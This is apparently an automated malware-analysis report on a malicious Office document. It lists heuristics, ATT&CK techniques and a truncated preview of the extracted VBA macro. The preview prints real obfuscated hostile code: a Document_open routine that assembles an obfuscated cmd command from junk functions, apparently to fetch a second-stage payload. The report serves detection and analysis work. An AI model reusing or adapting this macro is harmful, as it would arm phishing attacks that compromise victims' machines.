MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing VBA macros. The critical heuristic firing indicates a Shell() call within the VBA code, and the high severity heuristic confirms this is part of an auto-execution routine (Document_Open). This suggests the macro is designed to execute arbitrary commands, likely to download and run a second-stage payload. No specific family could be identified from the obfuscated script.
Heuristics 5
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 58613 bytes |
SHA-256: 20b1738deb4710b7199138b5596e665607b8702bd789b7987bd5aa74063ef0da |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "jMRWlkQk"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function KBiXKbCDdP()
qCDAz = JWXsj * IOJRRI / coaAc - vBjuvZ / 8889 + 54069 - (LcPotO / pDSfD * 87776 * RqDjsz / (PBbNE / abcSb / JChBd / 27735))
UqqZo = IccaYs * Zfwll / lKYGSw - NMDAE / 8330 + 75245 - (cwFIE / ICGqt * 67141 * ijGUYB / (HwkXb / SwZbWU / Lwjrd / 63756))
HRPZPa = czjfDm * jMijY / LdfUZd - mzPrr / 10958 + 43804 - (iUzMFn / bvqQS * 10281 * XJwIN / (dlvAl / sdioo / QGBrkU / 36315))
nkBIJc = RiTCAl * aTnUW / jQRUij - dbnjii / 46636 + 9230 - (VIboT / hsXbm * 8430 * YSzal / (WThZd / TqujTV / AUwit / 65355))
trMJr = jkOQrL * ROrcq / OHrMt - zIUZo / 11274 + 60519 - (OQokHC / oAAKp * 37617 * BKCQNz / (GCiTp / VMLaKM / CAaHVo / 89223))
iZzHu = MCUkHt * hmoiw / AfmID - ZDwan / 11185 + 86464 - (uotkSi / HoawMb * 87486 * hKvub / (fwQtB / lPbhi / SZttE / 31546))
KESlA = jYqhHW * HHiKa / JGSNvU - fQlbW / 65486 + 89203 - (zQqEGm / UfcuLE * 6868 * TtDft / (rqWRl / QnPLZ / XJqsFT / 94634))
zXhwjB = SErtM * hvaobp / cNazE - kjjoa / 34101 + 9112 - (SsTid / qHWkZ * 30308 * bGHNB / (fzmwi / hRfjQR / HIPCGJ / 95256))
End Function
Function QUSqiajvBTIqz()
bFAPFT = zmTqk * AGTIw / JIGaFv - tKcrP / 93270 + 99670 - (wlssV / WXAun * 83916 * GufKh / (UZViuT / ZBWuDu / GEVaPd / 49617))
awzqVF = Ktbjwu * USAmd / fQOlq - TcpQO / 5149 + 2824 - (jBiaI / tRwhZl * 48013 * RRdWOA / (JkLzP / FUcNiz / nSkZiC / 55195))
GrldwS = Hzjdv * jfzLiF / VNUul - rTYbwP / 31399 + 26756 - (YzMQZ / rftpkY * 74579 * MbKvZ / (tXqsIa / iWmOic / GBwSf / 55726))
hLEhk = YnroA * XQWat / nzVUvo - uwjEsL / 46635 + 88505 - (CzvhBv / pVpwNQ * 3872 * zkOoQ / (NQQiqM / izccSf / WfLms / 1652))
ArWVjZ = XLhHh * VfGiv / AVtjWq - vbvjo / 97390 + 51511 - (CcUwR / IzGJX * 85757 * ZWNZuX / (YHHAfR / fbbsIG / TDlkdJ / 83161))
FfREEn = zhiLf * aGzYds / AGrtH - BZEuD / 21179 + 64883 - (PwcPnm / ZMViFU * 57612 * crAhS / (zoYzCm / sniAzz / HVIpG / 66249))
End Function
Private Sub Document_open()
On Error Resume Next
oBDmW = IbFGdA / JYArt + 47943 * RzshO / 14765 * 23521
WYOhb = XGmwj / sJtwMW + 37319 * hJhcIY / 1872 * 82027
iAqEj = jrwzM / wNLXj + 60144 * IVrnK / 80194 * 8188
zIosWj = uRvHjw / WnJMf + 6447 * mvXfdO / 41398 * 19226
CwcDrDiwQl = Application.Run("zISYiMjnoYtF", "" + iYXUaiiYs + kkzIQMw + CVar("c") + TkGbNqmZCEjsFj + UoTNizaubY + EtiMSq + htWmjhCvdF + AzIFZLMHp + EWUpiP + TVzvjLB + AVYcs + fCCuCVhP + BvBipVfDTR + zFCIF + OXbVO + BUJkftih + nuGYYC + dNSQkXijHI + ShOdEa + KdFhJFfA + wlcLYM + TclIJGdKLT + hIqstDaZuLT + olaUBZjV + iptrvKMt + MVjJiEwucz + AiulwzBo + bLEvQrBTOv + ibVjlXQC + Ynncw + qwUWzrArr + ipfNWsERn + sIZtPoVWkHEYh + dbmkOtufN)
MtUak = vSrnf / YUqISq + 65236 * pwMlu / 44254 * 52636
zdLjwc = CKXwdP / dwwOQX + 71861 * ofqbPj / 67013 * 62260
End Sub
Function XtKTwZsO()
TjtaF = nvILNJ / ojpWM + 92200 * dKUSr / 95853 * 36303
HQIsSn = dCTkr / BzYsF + 2110 * dazrv / 73271 * 85126
pYJfT = wzAKw / lETzOX + 41132 * GDfSmi / 17980 * 28512
oLhWRD = msmjuk / BCPhi + 37206 * lENGG / 63477 * 37343
juMkNH = UEwTl / TUasF + 91360 * jEOXfD / 15019 * 38015
End Function
Attribute VB_Name = "MVvFlhzHuA"
Function EtiMSq()
On Error Resume Next
riiJUt = 23864 * vCGNq / (30998 + qdGnqF / wqOkPm - PKkOG + PKrVJM / bbIom)
wimpC = 4625 / IiJAtm - QFUmo * njbPIB * 77022 / 65052 - (18121 * zwqYKm - 92765 * umzIVH)
oQuiXY = 17110 / oukiZF - sVzjXL * mkddmG * 41387 / 66288 - (50343 * pnRzQG - 82374 * jdWwlf)
baLjzjjJ = CStr(Chr(RDlTdOZvlRsN + MCBDszMC + 109 + UpJYJuYsN + kDEQqKGzB)) + "d /" + CStr(Chr(PdzoMqn + PLVznFAmrs + 99 + nsczzmB + FqmTajaU)) + " " + "^fO^r" + " , , "
hNQcwq = 1677 / QGWjB - GzoJC * NrdJj * 84921 / 3540 - (74695 * KUKLGG - 38847 * NBHqwt)
EtYtJ = 63278 / DtipkH - GoOuFl * VvHlG * 52265 / 15563 - (90326 * Owzjf - 97635 * tVdWGR)
KJaiWMmSjh = " /^F" + " ; "
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.